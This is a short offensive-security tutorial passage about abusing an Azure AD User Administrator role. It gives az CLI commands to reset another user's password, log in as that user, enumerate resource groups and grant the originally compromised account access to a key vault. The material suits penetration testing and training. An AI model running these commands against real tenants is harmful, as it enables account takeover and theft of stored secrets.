Abusing User Administrator Role

Just like for the Cloud Administrator section, we'll walk though a small attack scenario which starts with us compromising a User Administrator account.

Let's say there is a credential vault in a subscription we are not part of and we want to get to that: what we'll do is is reset the password of a user that has user access administration role on the resource group that contains the vault, then we can log in as this user and delegate all the permissions we need to the initial compromised account.

For demonstration's sake we already individuated the user account we want to target to gain access to the target resource group, in an actual scenario this can be easily done by consulting the AzureHound results.

To reset the user's password we can use the following AZCli command

PS /home/otter> az ad user update --id "secureuser@minions.onmicrosoft.com" --password "SomethingSecure123!"

Now we can log in as secureuser and access the subscription and delegate access to the vault

# set subscription id
PS /home/otter> az account set --subscription <subscription_id>
# show all resource groups in the subscription
PS /home/otter> az group list -otable
# show all resources inside a resource group
PS /home/otter> az resource list --resource-group <resource_group_name>
# if we already know where the key vault is we can just query for its information right away
PS /home/otter> az resource list --name <key_vault_name>
# delegate access to the key vault to our initial user
PS /home/otter> az keyvault set-policy -n <key_vault_name> --key-permission get list --upn otter@minion.onmicrosoft.com